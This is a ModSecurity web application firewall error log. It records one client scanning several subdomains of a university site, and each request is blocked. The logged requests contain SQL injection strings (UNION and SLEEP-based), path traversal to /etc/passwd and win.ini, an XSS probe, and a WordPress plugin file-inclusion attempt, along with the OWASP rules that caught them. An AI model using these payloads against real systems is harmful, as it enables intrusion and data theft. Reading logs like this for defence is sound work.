[Tue Aug 29 11:40:52.394794 2023] [:error] [pid 1827] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: --  found within ARGS:id: -1 union select 1,md5(999999999),3,4,5,6,7,8,9,10-- "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/view_car.php"] [unique_id "ZO121MCo-f0AAAcjAkwAAAAw"]
[Tue Aug 29 11:40:53.556248 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEQAAAAH"]
[Tue Aug 29 11:40:53.696710 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbEsAAAAH"]
[Tue Aug 29 11:40:53.822869 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbE0AAAAH"]
[Tue Aug 29 11:40:53.846359 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbE4AAAAH"]
[Tue Aug 29 11:40:53.871558 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO121cCo-f0AAActbE8AAAAH"]
[Tue Aug 29 11:40:53.917591 2023] [:error] [pid 1837] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data:  found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.8"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/admin/asign-single-student-subjects.php"] [unique_id "ZO121cCo-f0AAActbFEAAAAH"]
[Tue Aug 29 11:40:55.432948 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAaZ9kEAAAAo"]
[Tue Aug 29 11:40:55.443793 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAQSWoEAAAA0"]
[Tue Aug 29 11:40:55.454837 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:filepath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c found within ARGS:filepath: ..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fosagent/repl/download-file"] [unique_id "ZO1218Co-f0AAAaZ9kIAAAAo"]
[Tue Aug 29 11:40:55.479715 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcvBbIAAAAJ"]
[Tue Aug 29 11:40:55.485372 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAcuUmEAAAAI"]
[Tue Aug 29 11:40:55.498218 2023] [:error] [pid 1567] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO1218Co-f0AAAYf-KQAAAAD"]
[Tue Aug 29 11:40:56.453239 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:dbPath. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../ found within ARGS:dbPath: ../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/chat/imController/showOrDownByurl.do"] [unique_id "ZO122MCo-f0AAAcvBbcAAAAJ"]
[Tue Aug 29 11:40:56.476254 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:name: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cWindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/fosagent/repl/download-snapshot"] [unique_id "ZO122MCo-f0AAAcqJFoAAAAG"]
[Tue Aug 29 11:40:58.356196 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcqJGAAAAAG"]
[Tue Aug 29 11:40:58.358886 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcYU6oAAAAp"]
[Tue Aug 29 11:40:58.369432 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcbSBAAAAAv"]
[Tue Aug 29 11:40:58.375767 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAcvBcAAAAAJ"]
[Tue Aug 29 11:40:58.381106 2023] [:error] [pid 1548] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'rogN'='rogN found within ARGS:id: 1' AND (SELECT 7774 FROM (SELECT(SLEEP(6)))dPPt) AND 'rogN'='rogN"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/admin/"] [unique_id "ZO122sCo-f0AAAYMWS4AAAAR"]
[Tue Aug 29 11:40:58.396906 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcvBcEAAAAJ"]
[Tue Aug 29 11:40:58.415463 2023] [:error] [pid 1834] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcqJGMAAAAG"]
[Tue Aug 29 11:40:58.417276 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcvBcIAAAAJ"]
[Tue Aug 29 11:40:58.420141 2023] [:error] [pid 1689] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAaZ9k8AAAAo"]
[Tue Aug 29 11:40:58.423215 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAcYU60AAAAp"]
[Tue Aug 29 11:40:58.437554 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:log. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:log: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/webadmin/reporter/view_server_log.php"] [unique_id "ZO122sCo-f0AAAcvBcMAAAAJ"]
[Tue Aug 29 11:40:58.463404 2023] [:error] [pid 1816] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAcYU64AAAAp"]
[Tue Aug 29 11:40:58.463677 2023] [:error] [pid 1819] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:pl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:pl: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php"] [unique_id "ZO122sCo-f0AAAcbSBQAAAAv"]
